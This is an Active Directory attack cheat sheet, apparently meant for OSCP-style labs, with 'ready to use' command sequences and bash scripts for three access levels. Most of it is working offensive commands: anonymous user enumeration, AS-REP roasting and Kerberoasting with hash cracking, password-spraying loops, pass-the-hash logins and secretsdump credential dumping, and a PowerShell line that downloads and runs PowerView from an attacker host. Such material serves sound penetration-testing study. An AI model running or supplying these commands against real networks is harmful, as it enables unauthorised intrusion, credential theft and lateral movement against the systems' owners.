╔══════════════════════════════════════════════════════════════════════════════════╗
║               COMPLETE AD ENUMERATION - 3 SCENARIOS READY TO USE               ║
╚══════════════════════════════════════════════════════════════════════════════════╝

╔══════════════════════════════════════════════════════════════════════════════════╗
║                    SCENARIO 1: BLACK BOX - NO CREDENTIALS                      ║
╚══════════════════════════════════════════════════════════════════════════════════╝

│ STEP 1: INITIAL SCAN (2-5 MINUTES)                                               │
│ nmap -sV -p 53,88,135,139,389,445,464,593,636,3268,3269,5985,5986,9389 -oA initial_scan 10.10.10.10 │
│                                                                                   │
│ STEP 2: CHECK ANONYMOUS ACCESS (TRY ALL METHODS)                                 │
│                                                                                   │
│ # 1. LDAP Anonymous (Port 389)                                                    │
│ ldapsearch -x -H ldap://10.10.10.10 -b "" -s base namingContexts                 │
│ # If returns DC info → anonymous bind works                                       │
│                                                                                   │
│ # 2. SMB Null Session (Port 445)                                                  │
│ smbclient -L //10.10.10.10 -N                                                    │
│ rpcclient -U "" -N 10.10.10.10 -c "enumdomusers"                                 │
│ # If shows shares/users → null session works                                      │
│                                                                                   │
│ # 3. Kerberos Pre-auth Check (Port 88)                                            │
│ # Need usernames first, skip for now                                             │
│                                                                                   │
│ STEP 3: ENUMERATE USERS WITHOUT CREDS                                             │
│                                                                                   │
│ # Method A: LDAP Anonymous Enum (BEST if works)                                   │
│ ldapsearch -x -H ldap://10.10.10.10 -b "DC=corp,DC=local" "(objectClass=user)" sAMAccountName | grep sAMAccountName | cut -d" " -f2 > users.txt │
│ # Also get descriptions for password hints:                                       │
│ ldapsearch -x -H ldap://10.10.10.10 -b "DC=corp,DC=local" "(objectClass=user)" description sAMAccountName | grep -B1 -i "password\|pass\|pwd" │
│                                                                                   │
│ # Method B: SMB/RPC Enum (Second best)                                            │
│ rpcclient -U "" -N 10.10.10.10                                                    │
│ rpcclient> enumdomusers                                                           │
│ rpcclient> querydispinfo                                                          │
│ rpcclient> enumdomgroups                                                          │
│ # Or one-liner:                                                                   │
│ rpcclient -U "" -N 10.10.10.10 -c "enumdomusers;enumdomgroups;querydispinfo" 2>/dev/null | grep -o "\[.*\]" | tr -d '[]' | grep -v "0x" > users.txt │
│                                                                                   │
│ # Method C: NetExec Quick Enum                                                    │
│ netexec smb 10.10.10.10 --users                                                   │
│ netexec smb 10.10.10.10 --groups                                                  │
│ netexec smb 10.10.10.10 --local-groups                                            │
│                                                                                   │
│ # Method D: Kerbrute (If Kerberos open)                                           │
│ kerbrute userenum -d corp.local --dc 10.10.10.10 /usr/share/seclists/Usernames/top-usernames-shortlist.txt │
│                                                                                   │
│ STEP 4: ATTACK WITH USERNAMES ONLY                                                │
│                                                                                   │
│ # 1. AS-REP Roasting                                                              │
│ GetNPUsers.py corp.local/ -usersfile users.txt -no-pass -dc-ip 10.10.10.10 -request -outputfile asrep_hashes.txt │
│ # If you get hashes: hashcat -m 18200 asrep_hashes.txt rockyou.txt               │
│                                                                                   │
│ # 2. Password Spraying (Try common passwords)                                     │
│ for pass in 'Password123' 'Welcome1' 'Spring2024!' 'Company2024!' 'P@ssw0rd'; do │
│   echo "Trying: $pass"                                                           │
│   netexec smb 10.10.10.10 -u users.txt -p "$pass" --continue-on-success          │
│   netexec winrm 10.10.10.10 -u users.txt -p "$pass" --continue-on-success        │
│ done                                                                              │
│                                                                                   │
│ # 3. Check SMB Shares for Sensitive Data                                          │
│ smbclient -L //10.10.10.10 -N                                                    │
│ # If you find readable shares:                                                    │
│ smbclient //10.10.10.10/Data -N -c "ls;get secret.txt"                           │
│                                                                                   │
│ # 4. RID Brute Force (Last resort)                                                │
│ lookupsid.py corp.local/guest:''@10.10.10.10                                      │
│                                                                                   │
│ STEP 5: IF YOU GET A PASSWORD/CREDENTIAL → GO TO SCENARIO 3                      │
│                                                                                   │
╠══════════════════════════════════════════════════════════════════════════════════╣
║                SCENARIO 2: GUEST ACCOUNT ACCESS (user:'' or guest)             ║
╚══════════════════════════════════════════════════════════════════════════════════╝

│ GUEST ACCESS TYPICALLY GIVES LIMITED INFO - CHECK THESE:                          │
│                                                                                   │
│ # 1. SMB with Guest Account                                                       │
│ smbclient -L //10.10.10.10 -U guest                                               │
│ smbclient //10.10.10.10/Public -U guest                                           │
│                                                                                   │
│ # 2. RPC with Guest                                                               │
│ rpcclient -U "guest" -N 10.10.10.10                                              │
│ rpcclient> enumdomusers                                                           │
│ rpcclient> enumdomgroups                                                          │
│                                                                                   │
│ # 3. LDAP with Anonymous/Guest                                                    │
│ ldapsearch -x -H ldap://10.10.10.10 -b "DC=corp,DC=local" -D "CN=Guest,CN=Users,DC=corp,DC=local" -w "" "(objectClass=user)" │
│                                                                                   │
│ # 4. Lookup SID with Guest                                                        │
│ lookupsid.py corp.local/guest:''@10.10.10.10                                      │
│ # This often works when other methods fail                                        │
│                                                                                   │
│ # 5. NetExec with Guest                                                           │
│ netexec smb 10.10.10.10 -u guest -p '' --users                                    │
│ netexec smb 10.10.10.10 -u guest -p '' --shares                                   │
│                                                                                   │
│ # 6. Check for AS-REP Roastable Users (Guest can check)                          │
│ GetNPUsers.py corp.local/guest:'' -usersfile users.txt -dc-ip 10.10.10.10 -request │
│ # Note: Now you have SOME auth, so -no-pass not needed                           │
│                                                                                   │
│ # 7. Try Common Password with Guest Account                                       │
│ # Sometimes guest has a weak password set                                         │
│ for pass in '' 'guest' 'Guest' 'Guest123' 'password'; do                         │
│   netexec smb 10.10.10.10 -u guest -p "$pass"                                     │
│ done                                                                              │
│                                                                                   │
│ GUEST ACCOUNT USEFUL FOR:                                                         │
│ - Enumerating users/groups                                                        │
│ - Checking share permissions                                                      │
│ - Finding AS-REP roastable users                                                  │
│ - SID enumeration                                                                 │
│ - Sometimes file read access in public shares                                     │
│                                                                                   │
╠══════════════════════════════════════════════════════════════════════════════════╣
║                SCENARIO 3: VALID USER CREDENTIALS (user:password)              ║
╚══════════════════════════════════════════════════════════════════════════════════╝

│ YOU HAVE user:password - NOW GO DEEP:                                             │
│                                                                                   │
│ STEP 1: BASIC ENUMERATION WITH CREDS                                              │
│                                                                                   │
│ # 1. LDAP Authenticated Enum                                                      │
│ ldapsearch -x -H ldap://10.10.10.10 -b "DC=corp,DC=local" -D "user@corp.local" -w 'password' "(objectClass=user)" │
│ # Get ALL user details:                                                           │
│ ldapsearch -x -H ldap://10.10.10.10 -b "DC=corp,DC=local" -D "user@corp.local" -w 'password' "(objectClass=user)" sAMAccountName description memberOf pwdLastSet lastLogon │
│                                                                                   │
│ # 2. SMB Authenticated Enum                                                       │
│ smbclient -L //10.10.10.10 -U 'corp.local\user'%'password'                       │
│ netexec smb 10.10.10.10 -u user -p 'password' --shares                           │
│ netexec smb 10.10.10.10 -u user -p 'password' --loggedon-users                   │
│ netexec smb 10.10.10.10 -u user -p 'password' --sessions                         │
│                                                                                   │
│ # 3. Get User Info                                                                │
│ netexec smb 10.10.10.10 -u user -p 'password' -M get_info                        │
│ net user "user" /domain                                                           │
│ net user "user" /domain | findstr /B /C:"User" /C:"Full" /C:"Password"           │
│                                                                                   │
│ STEP 2: KERBEROS ATTACKS (NOW POSSIBLE)                                           │
│                                                                                   │
│ # 1. Kerberoasting - Find service accounts                                        │
│ GetUserSPNs.py -request -dc-ip 10.10.10.10 corp.local/user:password              │
│ # If you get TGS hashes: hashcat -m 13100 tgs_hashes.txt rockyou.txt             │
│                                                                                   │
│ # 2. Check User's Group Memberships                                               │
│ netexec ldap 10.10.10.10 -u user -p 'password' --groups                          │
│ # Or PowerShell: Get-ADPrincipalGroupMembership -Identity user                   │
│                                                                                   │
│ # 3. Get Tickets                                                                  │
│ # Linux:                                                                          │
│ impacket-getTGT corp.local/user:password                                          │
│ export KRB5CCNAME=user.ccache                                                     │
│ # Windows:                                                                        │
│ Rubeus.exe asktgt /user:user /domain:corp.local /password:password /ptt          │
│                                                                                   │
│ STEP 3: BLOODHOUND COLLECTION                                                     │
│                                                                                   │
│ # Python collector (Linux):                                                       │
│ bloodhound-python -d corp.local -u user -p 'password' -c All -ns 10.10.10.10 --zip │
│                                                                                   │
│ # SharpHound (Windows):                                                           │
│ .\SharpHound.exe -c All --zipfilename bloodhound.zip                             │
│ .\SharpHound.exe -c GroupMembership,LocalAdmin,Session,Trusts --zipfilename quick.zip │
│                                                                                   │
│ STEP 4: POWERSHELL ENUMERATION                                                    │
│                                                                                   │
│ # Load PowerView:                                                                 │
│ powershell -ep bypass                                                             │
│ IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.15/PowerView.ps1')  │
│                                                                                   │
│ # Essential PowerView Commands:                                                   │
│ Get-DomainUser -Identity user -Properties samaccountname,memberof,lastlogon,pwdlastset │
│ Get-DomainGroup -Identity "Domain Admins" | Select-Object -ExpandProperty Member │
│ Find-DomainShare -CheckShareAccess                                               │
│ Get-DomainComputer -Properties operatingsystem,lastlogon | Sort-Object lastlogon -Descending │
│ Get-DomainGPO -Properties displayname,whencreated | Sort-Object whencreated -Descending │
│                                                                                   │
│ STEP 5: LATERAL MOVEMENT CHECKS                                                   │
│                                                                                   │
│ # 1. Check where user has local admin rights:                                     │
│ netexec smb 10.10.10.0/24 -u user -p 'password' --local-auth                     │
│ # Or PowerView: Find-LocalAdminAccess                                             │
│                                                                                   │
│ # 2. Check for WinRM access:                                                      │
│ netexec winrm 10.10.10.0/24 -u user -p 'password'                                │
│                                                                                   │
│ # 3. Check for RDP access:                                                        │
│ netexec rdp 10.10.10.0/24 -u user -p 'password'                                  │
│                                                                                   │
│ STEP 6: PRIVILEGE ESCALATION CHECKS                                               │
│                                                                                   │
│ # 1. Check ACLs for abuse:                                                        │
│ Get-DomainObjectAcl -Identity user -ResolveGUIDs | ? {$_.ActiveDirectoryRights -match "WriteProperty|GenericAll|WriteDacl|WriteOwner"} │
│                                                                                   │
│ # 2. Check for delegation:                                                        │
│ Get-DomainUser -Identity user -Properties samaccountname,useraccountcontrol,msds-allowedtodelegateto │
│                                                                                   │
│ # 3. Check user's privileges:                                                     │
│ whoami /priv                                                                      │
│ whoami /groups                                                                    │
│                                                                                   │
╠══════════════════════════════════════════════════════════════════════════════════╣
║                    AUTOMATED SCRIPTS FOR EACH SCENARIO                         ║
╚══════════════════════════════════════════════════════════════════════════════════╝

│ SCENARIO 1 SCRIPT: blackbox_enum.sh                                              │
│ #!/bin/bash                                                                       │
│ # Usage: ./blackbox_enum.sh <TARGET_IP> <DOMAIN>                                  │
│                                                                                   │
│ TARGET=$1                                                                         │
│ DOMAIN=$2                                                                         │
│                                                                                   │
│ echo "[1] Testing LDAP anonymous..."                                              │
│ ldapsearch -x -H ldap://$TARGET -b "" -s base 2>/dev/null && echo "LDAP Anonymous: YES" || echo "LDAP Anonymous: NO" │
│                                                                                   │
│ echo "[2] Testing SMB null session..."                                            │
│ smbclient -L //$TARGET -N 2>/dev/null && echo "SMB Null: YES" || echo "SMB Null: NO" │
│                                                                                   │
│ echo "[3] Enumerating users..."                                                   │
│ # Try LDAP first                                                                  │
│ ldapsearch -x -H ldap://$TARGET -b "DC=${DOMAIN//./,DC=}" "(objectClass=user)" sAMAccountName 2>/dev/null | grep sAMAccountName | cut -d" " -f2 > users.txt 2>/dev/null │
│                                                                                   │
│ # If no users, try RPC                                                            │
│ if [ ! -s users.txt ]; then                                                       │
│   rpcclient -U "" -N $TARGET -c "enumdomusers" 2>/dev/null | grep -o "\[.*\]" | tr -d '[]' | grep -v "0x" > users.txt │
│ fi                                                                                │
│                                                                                   │
│ echo "[4] AS-REP Roasting..."                                                     │
│ GetNPUsers.py $DOMAIN/ -usersfile users.txt -no-pass -dc-ip $TARGET -request 2>/dev/null | grep krb5asrep │
│                                                                                   │
│ echo "[5] Quick password spray..."                                                │
│ netexec smb $TARGET -u users.txt -p 'Password123' --continue-on-success 2>/dev/null | grep "\[+\]" │
│                                                                                   │
│ SCENARIO 2 SCRIPT: guest_enum.sh                                                  │
│ #!/bin/bash                                                                       │
│ TARGET=$1                                                                         │
│ DOMAIN=$2                                                                         │
│                                                                                   │
│ echo "[1] Testing guest SMB access..."                                            │
│ smbclient -L //$TARGET -U guest 2>/dev/null                                       │
│                                                                                   │
│ echo "[2] Enumerating with guest..."                                              │
│ rpcclient -U "guest" -N $TARGET -c "enumdomusers;enumdomgroups" 2>/dev/null       │
│                                                                                   │
│ echo "[3] Lookup SIDs..."                                                         │
│ lookupsid.py $DOMAIN/guest:''@$TARGET 2>/dev/null | head -20                      │
│                                                                                   │
│ echo "[4] Checking shares..."                                                     │
│ netexec smb $TARGET -u guest -p '' --shares 2>/dev/null                           │
│                                                                                   │
│ SCENARIO 3 SCRIPT: authenticated_enum.sh                                          │
│ #!/bin/bash                                                                       │
│ TARGET=$1                                                                         │
│ DOMAIN=$2                                                                         │
│ USER=$3                                                                           │
│ PASS=$4                                                                           │
│                                                                                   │
│ echo "[1] Kerberoasting..."                                                       │
│ GetUserSPNs.py -request -dc-ip $TARGET $DOMAIN/$USER:$PASS 2>/dev/null            │
│                                                                                   │
│ echo "[2] BloodHound collection..."                                               │
│ bloodhound-python -d $DOMAIN -u $USER -p "$PASS" -c All -ns $TARGET --zip 2>/dev/null │
│                                                                                   │
│ echo "[3] Getting group info..."                                                  │
│ netexec ldap $TARGET -u $USER -p "$PASS" --groups 2>/dev/null                     │
│                                                                                   │
│ echo "[4] Checking for local admin..."                                            │
│ netexec smb $TARGET -u $USER -p "$PASS" --local-auth 2>/dev/null                  │
│                                                                                   │
╠══════════════════════════════════════════════════════════════════════════════════╣
║                    QUICK REFERENCE - COMMANDS BY ACCESS LEVEL                  ║
╚══════════════════════════════════════════════════════════════════════════════════╝

│ NO ACCESS (Black Box):                                                            │
│   ldapsearch -x -H ldap://10.10.10.10 -b "" -s base                               │
│   smbclient -L //10.10.10.10 -N                                                   │
│   rpcclient -U "" -N 10.10.10.10 -c "enumdomusers"                                │
│   GetNPUsers.py domain.local/ -usersfile users.txt -no-pass -dc-ip 10.10.10.10    │
│   crackmapexec smb 10.10.10.10 -u users.txt -p 'Password123'                      │
│                                                                                   │
│ GUEST ACCESS:                                                                     │
│   smbclient -L //10.10.10.10 -U guest                                             │
│   rpcclient -U "guest" -N 10.10.10.10 -c "enumdomusers"                           │
│   lookupsid.py domain.local/guest:''@10.10.10.10                                  │
│   GetNPUsers.py domain.local/guest:'' -usersfile users.txt -dc-ip 10.10.10.10     │
│   netexec smb 10.10.10.10 -u guest -p '' --shares                                 │
│                                                                                   │
│ USER CREDENTIALS:                                                                 │
│   GetUserSPNs.py -request -dc-ip 10.10.10.10 domain.local/user:password           │
│   bloodhound-python -d domain.local -u user -p password -c All -ns 10.10.10.10    │
│   netexec ldap 10.10.10.10 -u user -p password --groups                           │
│   evil-winrm -i 10.10.10.10 -u user -p password                                   │
│   psexec.py domain.local/user:password@10.10.10.10                                │
│                                                                                   │
│ USER HASH:                                                                        │
│   crackmapexec smb 10.10.10.10 -u user -H NTLM_HASH                               │
│   evil-winrm -i 10.10.10.10 -u user -H NTLM_HASH                                  │
│   GetUserSPNs.py -request -dc-ip 10.10.10.10 domain.local/user -hashes :NTLM_HASH │
│   psexec.py domain.local/user@10.10.10.10 -hashes :NTLM_HASH                      │
│   secretsdump.py domain.local/user@10.10.10.10 -hashes :NTLM_HASH                 │
│                                                                                   │
│ KERBEROS TICKET:                                                                  │
│   export KRB5CCNAME=ticket.ccache                                                 │
│   GetUserSPNs.py -request -dc-ip 10.10.10.10 domain.local/ -k -no-pass            │
│   psexec.py domain.local/user@10.10.10.10 -k -no-pass                             │
│   secretsdump.py -k -no-pass domain.local/                                        │
│                                                                                   │
│ WINDOWS SHELL:                                                                    │
│   whoami /priv                                                                    │
│   net user %USERNAME% /domain                                                     │
│   net group "Domain Admins" /domain                                               │
│   .\winPEASany.exe quiet                                                          │
│   .\SharpHound.exe -c All                                                         │
│                                                                                   │
│ REMEMBER:                                                                         │
│ 1. Always start with Scenario 1 (no creds)                                        │
│ 2. Guest account often gives SOME info                                            │
│ 3. With ANY creds, run BloodHound immediately                                     │
│ 4. Password spraying works in most OSCP boxes                                     │
│ 5. Document every step with screenshots                                           │
│                                                                                   │
│ TOOLS NEEDED:                                                                     │
│   Kali default +: impacket-scripts, bloodhound-python, crackmapexec, responder, seclists │
│   Windows tools: winPEAS.exe, SharpHound.exe, PowerView.ps1, Rubeus.exe, Mimikatz.exe │
│                                                                                   │
╚══════════════════════════════════════════════════════════════════════════════════╝
